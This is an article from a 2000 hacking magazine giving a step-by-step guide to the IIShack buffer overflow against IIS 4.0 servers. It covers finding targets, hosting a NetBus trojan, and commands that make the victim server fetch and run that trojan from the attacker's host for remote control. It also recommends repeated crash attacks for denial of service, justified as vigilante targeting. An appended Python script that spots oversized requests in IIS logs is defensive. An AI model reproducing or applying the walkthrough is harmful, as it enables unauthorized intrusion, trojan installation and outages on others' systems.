SWAT MAGAZINE ISSUE TWENTY SIX FEBRUARY 2000
Site Busting: Remote buffer overflows
by -=The Firestarter=-
-----------------------------------------------------------------------

Ok time for an up-to-date way on site busting :o) although this method has been known to crash servers for anything up to six hours and not have the desired effect on the host server (i.e. access to it). I have seen a few guides to using this exploit, each one varying in how it's done, so I have decided to describe the way in which I do it.

So what is it? It's the IIShack exploit, yup a remote buffer overflow for IIS 4.0 (seems to work on early versions of IIS 5.0 as well). The source code for this exploit is in the exploit library: http://exploits.swateam.org in the NT section. You will need TASM32 to compile it, you can get that from: www.crackstore.com

Ok in simple terms this exploit sends a load of data to the IIS web server and causes it to crash; in the process it connects to another website and downloads a file, then executes it in the place of the IIS web server. Well it's something like that anyway! So what files can it execute? Every lamer's dream, TROJANS! Yep these proggies actually have a use for the serious hacker!

Now onto finding sites, well I tend to target kiddie porn sites with most of my attacks upon servers, so it doesn't matter if the attack fucks up and IIS crashes putting the website offline for hours on end. Anyway first off we'll find a target server, do that any way that you wish, no doubt you will want to crack different servers for different reasons, but anyway once you've found a server how do we check it for IIS 4.0? Well if any of you have CGI vulnerability scanning programs, most of them will tell you the web server software that is running, that is the method I use. But I have read that you can also telnet to port 80 of the target machine, type a few characters and whack return. Read over the crap that you get streaming onto telnet and it should tell you that it's IIS 4.0. Or alternatively you can just scan IP ranges of more or less any site and look for the default IIS 4 page that goes online when it's not being used for anything. Ok so it takes ages but if you're bored one day you'll probably find yourself doing it.

Ok now onto the "hack". I set up IIS 5.0 on my box when I'm doing this for the simple reason that I know when it has worked without pissing about with NetBus or anything like that. But you can use more or less any web page; in my opinion you are probably best using your ISP's web space, since some sites like Geocities and Tripod don't allow people to directly download files from them without getting the "click here to download" page. Also they don't allow executables to be uploaded, but like I said, I host the website on my computer for this one, I'll explain why in a moment.

Right, dig out a copy of NetBus 1.7 or another similar trojan (I don't like BO2k much, which is what most people use for this; if you like it then use it, or alternatively upload it once you've got in). A point worth making: most trojans don't run on NT, so you can forget about using Sub7. Use either NetBus or BO2k, I don't know of any others that will work. Set up the server so that it listens on port 80 and save it. Now upload the server to either your ISP's webspace or copy it into your c:\inetpub directory if you are running IIS on your box.

Ok time to crack that server! Or attempt to anyway. Firstly get the IP address of the server, you can do this by simply resolving it using any "hacker" utility that's worth having the name "hack" in its title; I use Essential NetTools 2.01 myself.

Ok so you have the IP address, we'll assume that it is 255.255.255.255 and your IP address is 255.255.255.222. Right, this exploit is run from the command line, so either open up a DOS window or go to start|run|command.com or start|run|cmd, go into the directory where you have kept your compiled IIShack.exe file (there are instructions in the source code on how to compile it). Then you will have to type:

iishack

So if we assume that you have the NetBus patch on your computer's web server and it's called patch.exe, you will enter this at the DOS prompt:

iishack 255.255.255.255 80 225.225.225.222/patch.exe

Whack enter again and it should say "Data Sent!" Now watch the little monitor thingies in the corner of your screen; if they both flash on (I'm assuming that you're not downloading anything and your connection should be idle) and you can see about 400k of data being sent from your box, then we can most likely assume that it is being downloaded. Or if the line:

02:02:24 225.225.225.225 GET /patch.exe 200

appears in your log file then assume that it worked. If you are using your ISP's webspace rather than your own box to host the trojan then you can simply put the URL (minus any http://) instead of your IP.

Now once it's been downloaded from your box, fire up NetBus and enter the target server's IP address, enter port 80 and then hit connect. Did you connect? Oh you did, well done! Now the box is yours to play with.

But what if it goes wrong? Well I have attempted the IIShack on a few kiddie porn sites and the only thing that has happened is that IIS has crashed on their server and it's not downloaded anything, heh not that I'm bothered since running it every six hours or so on it keeps it offline for a good while (re: most of the time). Carrying out this lethal DoS attack on such systems is a piece of piss, because no matter what you send to it in regards of the URL to the trojan, the server will go offline for anything between 5 minutes to 6 hours or more.

Teehee, simply send:

iishack 255.255.255.255 127.0.0.1/r00tmyass

or anything to that effect, then bingo, the server dies! I've tried all manner of things to get these servers to download trojans from other sites and such like, nothing seems to happen, all they do is crash. Oh well I suppose that it's nothing too bad when hitting kiddie porn sites.
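As an added, defender-side example that is not part of the original article: a small Python checker that reads IIS W3C extended log lines and flags requests whose URI is far longer than normal traffic, which is the footprint the "load of data" described above leaves when the request is logged. The log lines, the client addresses, the status codes and the 1024-byte threshold are all constructed assumptions for this example.

```python
"""Flag oversized HTTP requests in IIS W3C extended log lines.

The log lines below are constructed for this example; the field layout
follows the W3C extended format IIS writes.
"""

# Threshold is an assumption: the article only says the exploit "sends a
# load of data" to the server, so we key on request URIs far longer than
# anything a normal site would serve.
MAX_URI_LEN = 1024

SAMPLE_LOG = (
    "#Software: Microsoft Internet Information Server 4.0\n"
    "#Fields: time c-ip cs-method cs-uri-stem cs-uri-query sc-status\n"
    "02:01:10 10.0.0.5 GET /default.htm - 200\n"
    "02:02:20 10.0.0.9 GET /" + "A" * 3000 + " - 500\n"
    "02:02:24 10.0.0.5 GET /images/logo.gif - 200\n"
)

def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data line before #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than crash the checker
        yield dict(zip(fields, parts))

def find_oversized(text, limit=MAX_URI_LEN):
    """Return (time, client, uri length, status) for each oversized request."""
    hits = []
    for rec in parse_w3c(text):
        uri = rec.get("cs-uri-stem", "")
        if len(uri) > limit:
            hits.append((rec["time"], rec["c-ip"], len(uri), rec["sc-status"]))
    return hits

if __name__ == "__main__":
    for t, client, n, status in find_oversized(SAMPLE_LOG):
        print(f"{t} {client} uri_len={n} status={status}")
```

A request that takes the server down may never be flushed to the log file at all, so a check like this should be paired with a capture of inbound port 80 traffic rather than relied on alone.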